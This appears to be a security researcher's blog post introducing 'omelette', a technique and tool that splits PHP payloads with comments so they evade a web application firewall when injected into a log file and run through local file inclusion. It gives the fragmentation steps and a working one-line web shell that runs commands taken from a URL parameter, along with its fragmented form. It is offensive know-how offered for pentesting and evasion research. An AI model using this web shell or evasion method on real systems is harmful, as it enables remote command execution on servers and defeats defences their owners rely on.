Code fragmentation is not exactly a new technique, when dealing with binary exploitation, techniques like egg hunter and omelette refers to various ways to bootstrap a larger payload from a smaller one. However when I needed to bypass a modern WAF on a pentest where I could inject a user controlled value into a log file which could then be executed via LFI I came up with this technique to fragment the payload in a way that it is fragmented, but still executes as if it was consecutive function calls. I was waiting to release this at a future conference talk, but as Robin recently wrote a blog post using a similar technique to execute fragmented javascript I though the time was right for releasing it now.

Concept

The broad concept is:

1. Everything inside the <?php ?> tags is code
2. Everything inside the /* */ multi line comments are ignored
3. PHP parsing has some flexibility

The preferred use of this is to inject a small stager payload, but bigger files could be transformed as well.

The steps are simple enough that they can be performed manually:

1. Add comment after all opening tags
2. Add comment before all closing tags
3. Add comments before and after semi colons
4. Add comment after comma
5. Add comments before and after opening and closing pharanteses
6. Remove duplicate comments
7. Insert new line before each closing multi line comment
8. Remove empty lines

  ./omelette '<?=passthru($_GET[cmd]);?>'

         _            _   _         _            _             _          _          _            _
        /\ \         /\_\/\_\ _    /\ \         _\ \          /\ \       /\ \       /\ \         /\ \
       /  \ \       / / / / //\_\ /  \ \       /\__ \        /  \ \      \_\ \      \_\ \       /  \ \
      / /\ \ \     /\ \/ \ \/ / // /\ \ \     / /_ \_\      / /\ \ \     /\__ \     /\__ \     / /\ \ \
     / / /\ \ \   /  \____\__/ // / /\ \_\   / / /\/_/     / / /\ \_\   / /_ \ \   / /_ \ \   / / /\ \_\
    / / /  \ \_\ / /\/________// /_/_ \/_/  / / /         / /_/_ \/_/  / / /\ \ \ / / /\ \ \ / /_/_ \/_/
   / / /   / / // / /\/_// / // /____/\    / / /         / /____/\    / / /  \/_// / /  \/_// /____/\
  / / /   / / // / /    / / // /\____\/   / / / ____    / /\____\/   / / /      / / /      / /\____\/
 / / /___/ / // / /    / / // / /______  / /_/_/ ___/\ / / /______  / / /      / / /      / / /______
/ / /____\/ / \/_/    / / // / /_______\/_______/\__\// / /_______\/_/ /      /_/ /      / / /_______\
\/_________/          \/_/ \/__________/\_______\/    \/__________/\_\/       \_\/       \/__________/

============================================================================[justanotherhacker.com]===
<?= /*
*/passthru/*
*/(/*
*/$_GET[cmd]/*
*/)/*
*/;/*
*/?>

Or if fragmenting code from a file:

./omelette "$(cat t/shell3.php)" > plate

The various scripts to fragment and inject the code can be found at: https://github.com/wireghoul/php-omelette. While aimed at PHP the generic methods outlined above can be applied to many languages, including javascript, C/C++ and others.